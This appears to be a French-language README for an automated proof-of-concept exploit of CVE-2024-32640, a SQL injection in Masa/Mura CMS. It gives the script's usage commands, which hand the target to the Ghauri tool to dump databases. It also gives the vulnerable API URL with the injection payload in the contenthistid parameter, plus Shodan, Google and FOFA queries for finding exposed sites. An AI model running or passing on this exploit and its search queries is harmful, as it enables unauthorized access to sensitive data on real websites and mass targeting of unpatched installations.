
CVE-2024-32640 | PoC d'exploitation automatisée de SQLi
python3 CVE-2024-32640.py --url https://target.com/
Passez tous les arguments que vous souhaitez utiliser avec Ghauri, en suivant leur liste d'arguments :
python3 CVE-2024-32640.py --url https://target.com -g "--dbs --current-db"
python3 CVE-2024-32640.py --url https://target.com --ghauri "--dbs --current-db"

En utilisant la détection que j'ai implémentée dans l'outil, nous pouvons ensuite exploiter la cible vulnérable avec Ghauri. Le script automatise ce processus en transmettant toutes les informations nécessaires sur la cible dans un appel à Ghauri.

En ajoutant une séquence d'échappement (%5c) à la valeur du paramètre de requête HTML contenthisid, nous pouvons vérifier si une cible est vulnérable à cette injection SQL.
Une exploitation réussie pourrait conduire à un accès non autorisé à des données sensibles.
URL: https://target.com/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthistid=x%5c'&previewID=x
Requête Shodan: 'Generator: Masa CMS'
Google: "powered by Mura CMS"
FOFA: app="Mura-CMS"